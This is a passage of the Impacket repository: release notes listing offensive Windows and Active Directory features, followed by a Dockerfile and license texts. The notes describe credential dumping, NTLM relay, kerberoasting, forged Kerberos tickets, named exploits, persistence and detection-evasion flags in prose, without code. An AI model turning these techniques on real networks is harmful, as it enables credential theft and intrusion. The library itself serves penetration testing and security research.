[GetNPUsers.py](examples/GetNPUsers.py):\n * Added ability to enumerate targets with Kerberos KRB5CC (by @rmaksimov).\n\t* [GetUserSPNs.py](examples/GetUserSPNs.py):\n * Added new features for kerberoasting (by @mohemiv).\n\t* [ntlmrelayx.py](examples/ntlmrelayx.py):\n\t * Added ability to relay on new Windows versions that have SMB guest access disabled by default.\n\t * Added option to specify the NTLM Server Challenge used when receiving a connection.\n\t * Added relaying to RPC support (by @mohemiv).\n\t * Implemented WCFRelayServer (by @cnotin).\n\t * Added Zerologon DCSync Relay Client (by @dirkjanm).\n\t * Fixed issue in ldapattack.py when relaying and creating computer in CN=Computers (by @Hackndo).\n\t* [rpcdump.py](examples/rpcdump.py):\n * Added RPC over HTTP v2 support (by @mohemiv).\n\t* [secretsdump.py](examples/secretsdump.py):\n\t * Added ability to specifically delete a shadow based on its ID (by @phefley).\n\t * Dump plaintext machine account password when dumping the local registry secrets(by @dirkjanm).\n\n3. New examples\n\t- [exchanger.py](examples/exchanger.py): A tool for connecting to MS Exchange via\n RPC over HTTP v2 (by @mohemiv).\n\t- [rpcmap.py](examples/rpcmap.py): Scan for listening DCE/RPC interfaces (by @mohemiv).\n\nAs always, thanks a lot to all these contributors that make this library better every day (since last version):\n\n@mohemiv @mpgn @Romounet @ThePirateWhoSmellsOfSunflowers @rmaksimov @fuzzKitty @tshmul @spinenkoia @AaronRobson @ABCIFOGeowi40 @cclauss @cnotin @5alt @franferrax @Dliv3 @dirkjanm @Mr-Gag @vbersier @phefley @Hackndo\n\n\n## Impacket v0.9.21 (March 2020):\n\n1. Library improvements \n * New methods into `CCache` class to import/export kirbi (`KRB-CRED`) formatted tickets (by @Zer1t0). \n * Add `FSCTL_SRV_ENUMERATE_SNAPSHOTS` functionality to `SMBConnection` (by @rxwx). \n * Changes in NetBIOS classes in `nmb.py` (`select()` by `poll()` read from socket) (by @cnotin). \n * Timestamped logging added. \n * Interactive shell to perform LDAP operations (by @mlefebvre). \n * Added two DCE/RPC calls in `tsch.py` (by @mohemiv). \n * Single-source the version number and standardize on semantic + pre-release + local versioning (by @jsherwood0). \n * Added implementation for keytab files (by @kcirtapw). \n * Added SMB 3.1.1 support for Client SMB Connections.\n\n2. Examples improvements \n * [smbclient.py](examples/smbclient.py):\n * List the VSS snapshots for a specified path (by @rxwx). \n * [GetUserSPNs.py](examples/GetUserSPNs.py):\n * Added delegation information associated with accounts (by @G0ldenGunSec). \n * [dpapi.py](examples/dpapi.py): \n * Added more functions to decrypt masterkeys based on SID + hashes/key. Also support supplying hashes instead of the password for decryption(by @dirkjanm). \n * Pass the hash support for backup key retrieval (by @imaibou). \n * Added feature to decrypt a user's masterkey using the MS-BKRP (by @imaibou). \n * [raiseChild.py](examples/raiseChild.py):\n * Added a new flag to specify the RID of a user to dump credentials (by @0xdeaddood). \n * Added flags to bypass badly made detection use cases (by @MaxNad): \n * [smbexec.py](examples/smbexec.py):\n * Possibility to rename the PSExec uploaded binary name with the `-remote-binary-name` flag. \n * [psexec.py](examples/psexec.py):\n * Possibility to use another service name with the `-service-name` flag. \n * [ntlmrelayx.py](examples/ntlmrelayx.py): \n * Added a flag to use a SID as the escalate user for delegation attacks (by @0xe7). \n * Support for dumping LAPS passwords (by @praetorian-adam-crosser). \n * Added LDAP interactive mode that allow an attacker to manually perform basic operations\n like creating a new user, adding a user to a group , dump the AD, etc. (by @mlefebvre). \n * Support for multiple relays through one SMB connection (by @0xdeaddood). \n * Added support for dumping gMSA passwords (by @cube0x0). \n * [ticketer.py](examples/ticketer.py):\n * Added an option to use the SPNs keys from a keytab for a silver ticket(by @kcirtapw) \n\n3. New Examples \n - [addcomputer.py](examples/addcomputer.py): Allows add a computer to a domain using LDAP\n or SAMR (SMB) (by @jagotu) \n - [ticketConverter.py](examples/ticketConverter.py): This script converts kirbi files,\n commonly used by mimikatz, into ccache files used by Impacket, and vice versa (by @Zer1t0). \n - [findDelegation.py](examples/findDelegation.py): Simple script to quickly list all\n delegation relationships (unconstrained, constrained, resource-based constrained) in\n an AD environment (by @G0ldenGunSec). \n\nAs always, thanks a lot to all these contributors that make this library better every day (since last version): \n\n@jagotu, @Zer1t0 ,@rxwx, @mpgn, @danhph, @awsmhacks, @slasyz, @cnotin, @exploide, @G0ldenGunSec, @dirkjanm, @0xdeaddood, @MaxNad, @imaibou, @BarakSilverfort, @0xe7, @mlefebvre, @rmaksimov, @praetorian-adam-crosser, @jsherwood0, @mohemiv, @justin-p, @cube0x0, @spinenkoia, @kcirtapw, @MrAnde7son, @fridgehead, @MarioVilas. \n\n\n## Impacket v0.9.20 (September 2019):\n\n1. Library improvements\n * Python 3.6 support! This is the first release supporting Python 3.x so please issue tickets\n whenever you find something not working as expected. Libraries and examples should be fully\n functional. \n * Test coverage [improvements](https://github.com/SecureAuthCorp/impacket/pull/540) by @infinnovation-dev\n * Anonymous SMB 2.x Connections are not encrypted anymore (by @cnotin) \n * Support for [multiple PEKs](https://github.com/SecureAuthCorp/impacket/pull/618) when decrypting Windows 2016 DIT files (by @mikeryan) \n\n2. Examples improvements\n * [ntlmrelayx.py](examples/ntlmrelayx.py): \n * [CVE-2019-1019](https://github.com/SecureAuthCorp/impacket/pull/635): Bypass SMB singing for unpatched (by @msimakov)\n * Added [POC](https://github.com/SecureAuthCorp/impacket/pull/637) code for CVE-2019-1040 (by @dirkjanm)\n * Added NTLM relays leveraging [Webdav](https://github.com/SecureAuthCorp/impacket/pull/652) authentications (by @salu90)\n\n3. New Examples\n * [kintercept.py](examples/kintercept.py): A tool for intercepting krb5 connections and for\n testing KDC handling S4U2Self with unkeyed checksum (by @iboukris)\n\nAs always, thanks a lot to all these contributors that make this library better every day (since last version):\n\n@infinnovation-dev, @cnotin, @mikeryan, @SR4ven, @cclauss, @skorov, @msimakov, @dirkjanm, @franferrax, @iboukris, @n1ngod, @c0d3z3r0, @MrAnde7son.\n\n\n## Impacket v0.9.19 (April 2019):\n\n1. Library improvements\n * [[MS-EVEN]](impacket/dcerpc/v5/even.py) Interface implementation (Initial - by @MrAnde7son )\n\n2. Examples improvements\n * [ntlmrelayx.py](examples/ntlmrelayx.py): \n * Socks local admin check (by @imaibou)\n * Add Resource Based Delegation features (by @dirkjanm)\n * [smbclient.py](examples/smbclient.py):\n * Added ability to create/remove mount points to exploit James Forshaw's\n [Abusing Mount Points over the SMB Protocol](https://tyranidslair.blogspot.com/2018/12/abusing-mount-points-over-smb-protocol.html) technique (by @Qwokka)\n * [GetST.py](examples/getST.py):\n * Added resource-based constrained delegation support to S4U (@eladshamir)\n * [GetNPUsers.py](examples/GetNPUsers.py):\n * Added hashcat/john format and users file input (by @Zer1t0)\n\nAs always, thanks a lot to all these contributors that make this library better every day (since last version):\n\n@dirkjanm, @MrAnde7son, @ibo, @franferrax, @Qwokka, @CaledoniaProject , @eladshamir, @Zer1t0, @martingalloar, @muizzk, @Petraea, @SR4ven, @Fist0urs, @Zer1t0.\n\n\n## Impacket v0.9.18 (December 2018):\n\n1. Library improvements\n * Replace unmaintained PyCrypto for pycryptodome (@dirkjanm)\n * Using cryptographically secure pseudo-random generators\n * Kerberos \"no pre-auth and RC4\" handling in GetKerberosTGT (by @qlemaire)\n * Test cases adjustments, travis and flake support (@cclauss)\n * Python3 test cases fixes (@eldipa)\n * Adding DPAPI / Vaults related structures and functions to decrypt secrets\n * [[MS-RPRN]](impacket/dcerpc/v5/rprn.py) Interface implementation (Initial)\n\n2. Examples improvements\n * [ntlmrelayx.py](examples/ntlmrelayx.py):\n * Optimize ACL enumeration and improve error handling in ntlmrelayx LDAP attack (by @dirkjanm)\n * [secretsdump.py](examples/secretsdump.py):\n * Added dumping of machine account Kerberos keys (@dirkjanm). `DPAPI_SYSTEM` LSA Secret is now parsed and key contents are shown.\n * [GetUserSPNs.py](examples/GetUserSPNs.py):\n * Bugfixes and cross-domain support (@dirkjanm)\n\n3. New Examples\n * [dpapi.py](examples/dpapi.py): Allows decrypting vaults, credentials and masterkeys protected by DPAPI. Domain backup key support added by @MrAnde7son \n\nAs always, thanks a lot to all these contributors that make this library better every day (since last version):\n\n@dirkjanm, @MrAnde7son, @franferrax, @MrRobot86, @qlemaire, @cauan, @eldipa.\n\n\n## Impacket v0.9.17 (May 2018):\n\n1. Library improvements\n * New `[MS-PAC]` [Implementation](impacket/krb5/pac.py).\n * [LDAP engine](impacket/ldap): Added extensibleMatch string filter parsing, simple\n paging support and handling of unsolicited notification (by @kacpern)\n * [ImpactDecoder](impacket/ImpactDecoder.py): Add `EAPOL`, `BOOTP` and `DHCP` packet\n decoders (by Michael Niewoehner)\n * [Kerberos engine](impacket/krb5): `DES-CBC-MD5` support to kerberos added (by @skelsec)\n * [SMB3 engine](https://github.com/SecureAuthCorp/impacket/commit/f62fc5c3946430374f92404e892f8c48943d411c): If target server supports SMB >= 3, encrypt packets by default.\n * Initial `[MS-DHCPM]` and `[MS-EVEN6]` Interface implementation by @MrAnde7son \n * Major improvements to the [NetBIOS layer](https://github.com/SecureAuthCorp/impacket/commit/0808e45b796741aea4162bd756e3f54522e8045b).\n More use of [structure.py](impacket/structure.py) in there.\n * [MQTT](https://github.com/SecureAuthCorp/impacket/commit/8cef002928ca52be4e9476a87a54d836b5efa81e) Protocol Implementation and example.\n * Tox/Coverage Support added, test cases moved to its own directory. Major overhaul.\n * Many fixes and improvements in Kerberos, SMB and DCERPC (too much to name in a few lines).\n\n2. Examples improvements\n * [GetUserSPNs.py](examples/GetUserSPNs.py):\n * `-request-user` parameter added. Requests STs for the SPN associated to the user\n specified. Added support for AES Kerberoast tickets (by @elitest).\n * [services.py](examples/services.py):\n * Added port 139 support and related options (by @real-datagram).\n * [samrdump.py](examples/samrdump.py): \n * `-csv` switch to output format in CSV added.\n * [ntlmrelayx.py](examples/ntlmrelayx.py):\n * Major architecture overhaul. Now working mostly through dynamically loaded plugins. SOCKS proxy support for relayed connections. Specific attacks for every protocol and new protocols support (IMAP, POP3, SMTP). Awesome contributions by @dirkjanm.\n * [secretsdump.py](examples/secretsdump.py):\n * AES(128) support for SAM hashes decryption. OldVal parameter dump added to LSA\n secrets dump (by @Ramzeth).\n * [mssqlclient.py](examples/mssqlclient.py):\n * Alternative method to execute cmd's on MSSQL (sp_start_job). (by @Kayzaks).\n * [lsalookupsid.py](examples/lsalookupsid.py):\n * Added no-pass and domain-users options (by @ropnop). \n\n3. New Examples\n * [ticketer.py](examples/ticketer.py): Create Golden/Silver tickets from scratch or\n based on a template (legally requested from the KDC) allowing you to customize \n some of the parameters set inside the `PAC_LOGON_INFO` structure, in particular the\n groups, extrasids, duration, etc. Silver tickets creation by @machosec and @bransh.\n * [GetADUsers.py](examples/GetADUsers.py): Gathers data about the domain's users and\n their corresponding email addresses. It will also include some extra information\n about last logon and last password set attributes.\n * [getPac.py](examples/getPac.py): Gets the PAC (Privilege Attribute Certificate)\n structure of the specified target user just having a normal authenticated user\n credentials. It does so by using a mix of `[MS-SFU]`'s `S4USelf` + User to User\n Kerberos Authentication.\n * [getArch.py](examples/getArch.py): Will connect against a target (or list of targets)\n machine/s and gather the OS architecture type installed by (ab)using a documented MSRPC feature.\n * [mimikatz.py](examples/mimikatz.py): Mini shell to control a remote mimikatz RPC\n server developed by @gentilkiwi.\n * [sambaPipe.py](examples/sambaPipe.py): Will exploit CVE-2017-7494, uploading and\n executing the shared library specified by the user through the `-so` parameter.\n * [dcomexec.py](examples/dcomexec.py): A semi-interactive shell similar to `wmiexec.py`,\n but using different DCOM endpoints. Currently supports `MMC20.Application`, `ShellWindows` and\n `ShellBrowserWindow` objects. (contributions by @byt3bl33d3r).\n * [getTGT.py](examples/getTGT.py): Given a password, hash or aesKey, this script will\n request a TGT and save it as ccache.\n * [getST.py](examples/getST.py): Given a password, hash, aesKey or TGT in ccache, this\n script will request a Service Ticket and save it as ccache. If the account has constrained\n delegation (with protocol transition) privileges you will be able to use the `-impersonate`\n switch to request the ticket on behalf other user.\n\nAs always, thanks a lot to all these contributors that make this library better every day (since last version):\n\n@dirkjanm, @real-datagram, @kacpern, @martinuy, @xelphene, @blark, @the-useless-one, @contactr2m, @droc, @martingalloar, @skelsec, @franferrax, @Fr0stbyt3, @ropnop, @MrAnde7son, @machosec, @federicoemartinez, @elitest, @symeonp, @Kanda-Motohiro, @Ramzeth, @mohemiv, @arch4ngel, @derekchentrendmicro, @Kayzaks, @donwayo, @bao7uo, @byt3bl33d3r, @xambroz, @luzpaz, @TheNaterz, @Mikkgn, @derUnbekannt.\n\n\n## Impacket v0.9.15 (June 2016):\n\n1. Library improvements\n * `SMB3.create`: define `CreateContextsOffset` and `CreateContextsLength` when applicable (by @rrerolle)\n * Retrieve user principal name from `CCache` file allowing to call any script with `-k` and just the target system (by @MrTchuss)\n * Packet fragmentation for DCE RPC layer mayor overhaul.\n * Improved pass-the-key attacks scenarios (by @skelsec)\n * Adding a minimalistic LDAP/s implementation (supports PtH/PtT/PtK). Only search is available (and you need to\n build the search filter yourself)\n * IPv6 improvements for DCERPC/LDAP and Kerberos\n\n2. Examples improvements\n * Adding `-dc-ip` switch to all examples. It allows specifying what the IP for the domain is.\n It assumes the DC and KDC resides in the same server.\n * `secretsdump.py`:\n * Adding support for Win2016 TP4 in LOCAL or `-use-vss` mode\n * Adding `-just-dc-user` switch to download just a single user data (DRSUAPI mode only)\n * Support for different ReplEpoch (DRSUAPI only)\n * pwdLastSet is also included in the output file\n * New structures/flags added for 2016 TP5 PAM support\n * `wmiquery.py`:\n * Adding `-rpc-auth-level` switch (by @gadio)\n * `smbrelayx.py`:\n * Added option to specify authentication status code to be sent to requesting client (by @mgeeky)\n * Added one-shot parameter. After successful authentication, only execute the attack once for each target (per protocol)\n\n3. New Examples\n * `GetUserSPNs.py`: This module will try to find Service Principal Names that are associated with normal user account.\n This is part of the kerberoast attack researched by Tim Medin (@timmedin)\n * `ntlmrelayx.py`: `smbrelayx.py` on steroids!. NTLM relay attack from/to multiple protocols (HTTP/SMB/LDAP/MSSQL/etc)\n (by @dirkjanm)\n\n\n## Impacket v0.9.14 (January 2016):\n\n1. Library improvements\n * `[MS-TSCH]` - ATSVC, SASec and ITaskSchedulerService Interface implementations\n * `[MS-DRSR]` - Directory Replication Service DRSUAPI Interface implementation\n * Network Data Representation (NDR) runtime overhaul. Big performance and reliability improvements achieved\n * Unicode support (optional) for the SMBv1 stack (by @rdubourguais)\n * NTLMv2 enforcement option on SMBv1 client stack (by @scriptjunkie)\n * Kerberos support for TDS (MSSQL)\n * Extended present flags support on RadioTap class\n * Old DCERPC runtime code removed\n\n2. Examples improvements\n * `mssqlclient.py`:\n * Added Kerberos authentication support\n * `atexec.py`:\n * It now uses ITaskSchedulerService interface, adding support for Windows 2012 R2\n * `smbrelayx.py`:\n * If no file to upload and execute is specified (-E) it just dumps the target user's hashes by default\n * Added -c option to execute custom commands in the target (by @byt3bl33d3r)\n * `secretsdump.py`:\n * Active Directory hashes/Kerberos keys are dumped using `[MS-DRSR]` (`IDL_DRSGetNCChanges` method)\n by default. VSS method is still available by using the -use-vss switch\n * Added `-just-dc` (Extract only NTDS.DIT NTLM Hashes and Kerberos) and\n `-just-dc-ntlm` (only NTDS.DIT NTLM Hashes) options\n * Added resume capability (only for NTDS in DRSUAPI mode) in case the connection drops.\n Use `-resumefile` option.\n * Added Primary:CLEARTEXT Property from supplementalCredentials attribute dump (`[MS-SAMR]` `3.1.1.8.11.5`)\n * Add support for multiple password encryption keys (PEK) (by @s0crat)\n * `goldenPac.py`:\n * Tests all DCs in domain and adding forest's enterprise admin group inside PAC\n\n3. New examples\n * `raiseChild.py`: Child domain to forest privilege escalation exploit. Implements a\n child-domain to forest privilegeescalation as [detailed by Sean Metcalf](https://adsecurity.org/?p=1640).\n * `netview.py`: Gets a list of the sessions opened at the remote hosts and keep track of them (original idea by @mubix)\n\n\n## Impacket v0.9.13 (May 2015):\n\n1. Library improvements\n * Kerberos support for SMB and DCERPC featuring:\n * `kerberosLogin()` added to SMBConnection (all SMB versions).\n * Support for `RPC_C_AUTHN_GSS_NEGOTIATE` at the DCERPC layer. This will \n negotiate Kerberos. This also includes DCOM.\n * Pass-the-hash, pass-the-ticket and pass-the-key support.\n * Ccache support, compatible with Kerberos utilities (kinit, klist, etc).\n * Support for `RC4`, `AES128_CTS_HMAC_SHA1_96` and `AES256_CTS_HMAC_SHA1_96` ciphers.\n * Support for `RPC_C_AUTHN_LEVEL_PKT_PRIVACY`/`RPC_C_AUTHN_LEVEL_PKT_INTEGRITY`.\n * `[MS-SAMR]`: Supplemental Credentials support (used by secretsdump.py)\n * SMBSERVER improvements:\n * SMB2 (2.002) dialect experimental support. \n * Adding capability to export to John The Ripper format files\n * Library logging overhaul. Now there's a single logger called `impacket`.\n\n2. Examples improvements\n * Added Kerberos support to all modules (incl. pass-the-ticket/key)\n * Ported most of the modules to the new dcerpc.v5 runtime.\n * `secretsdump.py`:\n * Added dumping Kerberos keys when parsing NTDS.DIT\n * `smbserver.py`:\n * Support for SMB2 (not enabled by default)\n * `smbrelayx.py`:\n * Added support for MS15-027 exploitation.\n\n3. New examples\n * `goldenPac.py`: MS14-068 exploit. Saves the golden ticket and also launches a \n psexec session at the target.\n * `karmaSMB.py`: SMB Server that answers specific file contents regardless of\n the SMB share and pathname requested. \n * `wmipersist.py`: Creates persistence over WMI. Adds/Removes WMI Event \n Consumers/Filters to execute VBS based on a WQL filter or timer specified.\n\n\n## Impacket v0.9.12 (July 2014):\n\n1. Library improvements\n * The following protocols were added based on its standard definition\n * `[MS-DCOM]` - Distributed Component Object module Protocol (`dcom.py`)\n * `[MS-OAUT]` - OLE Automation Protocol (`dcom/oaut.py`)\n * `[MS-WMI]`/`[MS-WMIO]` : Windows Management Instrumentation Remote Protocol (`dcom/wmi.py`)\n\n2. New examples\n * `wmiquery.py`: executes WMI queries and get WMI object's descriptions.\n * `wmiexec.py`: agent-less, semi-interactive shell using WMI.\n * `smbserver.py`: quick an easy way to share files using the SMB protocol.\n\n\n## Impacket v0.9.11 (February 2014):\n\n1. Library improvements\n * New RPC and NDR runtime (located at `impacket.dcerpc.v5`, old one still available)\n * Support marshaling/unmarshaling for NDR20 and NDR64 (experimental)\n * Support for `RPC_C_AUTHN_NETLOGON` (experimental)\n * The following interface were developed based on its standard definition:\n * `[MS-LSAD]` - Local Security Authority (Domain Policy) Remote Protocol (lsad.py)\n * `[MS-LSAT]` - Local Security Authority (Translation Methods) Remote Protocol (lsat.py)\n * `[MS-NRPC]` - Netlogon Remote Protocol (nrpc.py) \n * `[MS-RRP]` - Windows Remote Registry Protocol (rrp.py)\n * `[MS-SAMR]` - Security Account Manager (SAM) Remote Protocol (samr.py)\n * `[MS-SCMR]` - Service Control Manager Remote Protocol (scmr.py)\n * `[MS-SRVS]` - Server Service Remote Protocol (srvs.py) \n * `[MS-WKST]` - Workstation Service Remote Protocol (wkst.py) \n * `[MS-RPCE]-C706` - Remote Procedure Call Protocol Extensions (epm.py)\n * `[MS-DTYP]` - Windows Data Types (dtypes.py)\n * Most of the DCE Calls have helper functions for easier use. Test cases added for \n all calls (check the test cases directory)\n * ESE parser (Extensive Storage Engine) (ese.py)\n * Windows Registry parser (winregistry.py)\n * TDS protocol now supports SSL, can be used from mssqlclient\n * Support for EAPOL, EAP and WPS decoders\n * VLAN tagging (IEEE 802.1Q and 802.1ad) support for ImpactPacket, done by dan.pisi\n\n2. New examples\n * `rdp_check.py`: tests whether an account (pwd or hashes) is valid against an RDP server\n * `esentutl.py`: ESE example to show how to interact with ESE databases (e.g. NTDS.dit)\n * `ntfs-read.py`: mini shell for browsing an NTFS volume\n * `registry-read.py`: Windows offline registry reader\n * `secretsdump.py`: agent-less remote windows secrets dump (SAM, LSA, CDC, NTDS)\n\n\n## Impacket v0.9.10 (March 2013):\n\n1. Library improvements\n * SMB version 2 and 3 protocol support (`[MS-SMB2]`). Signing supported, encryption for\n SMB3 still pending.\n * Added a SMBConnection layer on top of each SMB specific protocol. Much simpler and\n SMB version independent. It will pick the best SMB Version when connecting against the\n target. Check `smbconnection.py` for a list of available methods across all the protocols.\n * Partial TDS implementation (`[MS-TDS]` & `[MC-SQLR]`) so we could talk with MSSQL Servers.\n * Unicode support for the smbserver. Newer OSX won't connect to a non unicode SMB Server.\n * DCERPC Endpoints' new calls\n * EPM: `lookup()`: It can work as a general portmapper, or just to find specific interfaces/objects.\n\n2. New examples\n * `mssqlclient.py`: A MS SQL client, allowing to do MS SQL or Windows Authentication (accepts hashes) and then gives\n you an SQL prompt for your pleasure.\n * `mssqlinstance.py`: Lists the MS SQL instances running on a target machine.\n * `rpcdump.py`: Output changed. Hopefully more useful. Parsed all the Windows Protocol Specification looking for the\n UUIDs used and that information is included as well. This could be helpful when reading a portmap output and to\n develop new functionality to interact against a target interface.\n * `smbexec.py`: Another alternative to psexec. Less capabilities but might work on tight AV environments. Based on the\n technique described at https://web.archive.org/web/20190515131124/https://www.optiv.com/blog/owning-computers-without-shell-access. It also\n supports instantiating a local smbserver to receive the output of the commandos executed for those situations\n where no share is available on the other end.\n * `smbrelayx.py`: It now also listens on port 80 and forwards/reflects the credentials accordingly.\n\nAnd finally tons of fixes :).\n\n\n## Impacket v0.9.9 (July 2012):\n\n1. Library improvements\n * Added 802.11 packets encoding/decoding\n * Addition of support for IP6, ICMP6 and NDP packets. Addition of `IP6_Address` helper class.\n * SMB/DCERPC:\n * GSS-API/SPNEGO Support.\n * SPN support in auth blob.\n * NTLM2 and NTLMv2 support. \n * Default SMB port now 445. If `*SMBSERVER` is specified the library will try to resolve the netbios name.\n * Pass the hash supported for SMB/DCE-RPC.\n * IPv6 support for SMB/NMB/DCERPC.\n * DOMAIN support for authentication. \n * SMB signing support when server enforces it.\n * DCERPC signing/sealing for all NTLM flavours.\n * DCERPC transport now accepts an already established SMB connection.\n * Basic SMBServer implementation in Python. It allows third-party DCE-RPC servers to handle DCERPC Request (by\n forwarding named pipes requests).\n * Minimalistic SRVSVC dcerpc server to be used by SMBServer in order to avoid Windows 7 nasty bug when that pipe's\n not functional.\n * DCERPC Endpoints' new calls:\n * `SRVSVC`: `NetrShareEnum(Level1)`, `NetrShareGetInfo(Level2)`, `NetrServerGetInfo(Level2)`,\n `NetrRemoteTOD()`, `NetprNameCanonicalize()`.\n * `SVCCTL`: `CloseServiceHandle()`, `OpenSCManagerW()`, `CreateServiceW()`, `StartServiceW()`,\n `OpenServiceW()`, `OpenServiceA()`, `StopService()`, `DeleteService()`, `EnumServicesStatusW()`,\n `QueryServiceStatus()`, `QueryServiceConfigW()`.\n * `WKSSVC`: `NetrWkstaTransportEnum()`.\n * `SAMR`: `OpenAlias()`, `GetMembersInAlias()`.\n * `LSARPC`: `LsarOpenPolicy2()`, `LsarLookupSids()`, `LsarClose()`.\n\n2. New examples\n * `ifmap.py`: First, this binds to the MGMT interface and gets a list of interface IDs. It adds to this a large list\n of interface UUIDs seen in the wild. It then tries to bind to each interface and reports whether the interface is\n listed and/or listening.\n * `lookupsid.py`: DCE/RPC lookup sid brute forcer example.\n * `opdump.py`: This binds to the given hostname:port and DCERPC interface. Then, it tries to call each of the first\n 256 operation numbers in turn and reports the outcome of each call.\n * `services.py`: SVCCTL services common functions for manipulating services (START/STOP/DELETE/STATUS/CONFIG/LIST).\n * `test_wkssvc`: DCE/RPC WKSSVC examples, playing with the functions Implemented.\n * `smbrelayx`: Passes credentials to a third party server when doing MiTM.\n * `smbserver`: Multiprocess/threading smbserver supporting common file server functions. Authentication all done but\n not enforced. Tested under Windows, Linux and MacOS clients.\n * `smbclient.py`: now supports history, new commands also added.\n * `psexec.py`: Execute remote commands on Windows machines\n" }, { "path": "Dockerfile", "content": "FROM python:3.13-alpine as compile\nWORKDIR /opt\nRUN apk add --no-cache git gcc musl-dev python3-dev libffi-dev openssl-dev cargo\nRUN python3 -m pip install virtualenv\nRUN virtualenv -p python venv\nENV PATH=\"/opt/venv/bin:$PATH\"\nRUN git clone --depth 1 https://github.com/fortra/impacket.git\nRUN python3 -m pip install impacket/\n\nFROM python:3.13-alpine\nCOPY --from=compile /opt/venv /opt/venv\nENV PATH=\"/opt/venv/bin:$PATH\"\nENTRYPOINT [\"/bin/sh\"]\n" }, { "path": "LICENSE", "content": "Licencing\n---------\n\nWe provide this software under a slightly modified version of the\nApache Software License. The only changes to the document were the\nreplacement of \"Apache\" with \"Impacket\" and \"Apache Software Foundation\"\nwith \"Fortra\". Feel free to compare the resulting\ndocument to the official Apache license.\n\nThe `Apache Software License' is an Open Source Initiative Approved\nLicense.\n\n\nThe Apache Software License, Version 1.1\nModifications by Fortra (see above)\n\nCopyright (c) 2000 The Apache Software Foundation. All rights\nreserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions\nare met:\n\n1. Redistributions of source code must retain the above copyright\n notice, this list of conditions and the following disclaimer.\n\n2. Redistributions in binary form must reproduce the above copyright\n notice, this list of conditions and the following disclaimer in\n the documentation and/or other materials provided with the\n distribution.\n\n3. The end-user documentation included with the redistribution,\n if any, must include the following acknowledgment:\n \"This product includes software developed by\n SecureAuth Corporation (https://www.secureauth.com/) and Fortra (https://www.fortra.com).\"\n Alternately, this acknowledgment may appear in the software itself,\n if and wherever such third-party acknowledgments normally appear.\n\n4. The names \"Impacket\", \"SecureAuth Corporation\", and \"Fortra\" must\n not be used to endorse or promote products derived from this\n software without prior written permission. For written\n permission, please reach out to https://www.coresecurity.com/about/contact.\n\n5. Products derived from this software may not be called \"Impacket\",\n nor may \"Impacket\" appear in their name, without prior written\n permission of Fortra.\n\nTHIS SOFTWARE IS PROVIDED ``AS IS'' AND ANY EXPRESSED OR IMPLIED\nWARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES\nOF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\nDISCLAIMED. IN NO EVENT SHALL THE APACHE SOFTWARE FOUNDATION OR\nITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,\nSPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT\nLIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF\nUSE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND\nON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\nOR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT\nOF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\nSUCH DAMAGE.\n\n\n\nimpacket/smb.py and impacket/nmb.py are based on Pysmb by Michael Teo\n(https://miketeo.net/projects/pysmb/), and are distributed under the\nfollowing license:\n\nThis software is provided 'as-is', without any express or implied\nwarranty. In no event will the author be held liable for any damages\narising from the use of this software.\n\nPermission is granted to anyone to use this software for any purpose,\nincluding commercial applications, and to alter it and redistribute it\nfreely, subject to the following restrictions:\n\n1. The origin of this software must not be misrepresented; you must\n not claim that you wrote the original software. If you use this\n software in a product, an acknowledgment in the product\n documentation would be appreciated but is not required.\n\n2. Altered source versions must be plainly marked as such, and must\n not be misrepresented as being the original software.\n\n3. This notice cannot be removed or altered from any source\n distribution.\n\n\nexamples/kintercept.py by Isaac Boukris (https://github.com/iboukris/S4U/)\nis distributed under the following license:\n\nCopyright (c) 2019 Isaac Boukris \n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in all\ncopies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\nSOFTWARE.\n\n\nimpacket/examples/recomsvc.py is based on recomsvc by Talha Tariq\nand is distributed under the following license:\n\nCopyright (c) 2006 Talha Tariq [ talha.tariq@gmail.com ]\nAll rights are reserved.\n\nPermission to use, copy, modify, and distribute this software\nfor any purpose and without any fee is hereby granted,\nprovided this notice is included in its entirety in the\ndocumentation and in the source files.\n\nThis software and any related documentation is provided \"as is\"\nwithout any warranty of any kind, either express or implied,\nincluding, without limitation, the implied warranties of\nmerchantability or fitness for a particular purpose. The entire\nrisk arising out of use or performance of the software remains\nwith you.\n\n\nimpacket/krb5/asn1.py and impacket/krb5/types.py by Marc Horowitz\nare distributed under the following license:\n\nCopyright (c) 2013, Marc Horowitz\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or without\nmodification, are permitted provided that the following conditions are\nmet:\n\nRedistributions of source code must retain the above copyright notice,\nthis list of conditions and the following disclaimer.\n\nRedistributions in binary form must reproduce the above copyright\nnotice, this list of conditions and the following disclaimer in the\ndocumentation and/or other materials provided with the distribution.\n\nTHIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS\n\"AS IS\" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT\nLIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR\nA 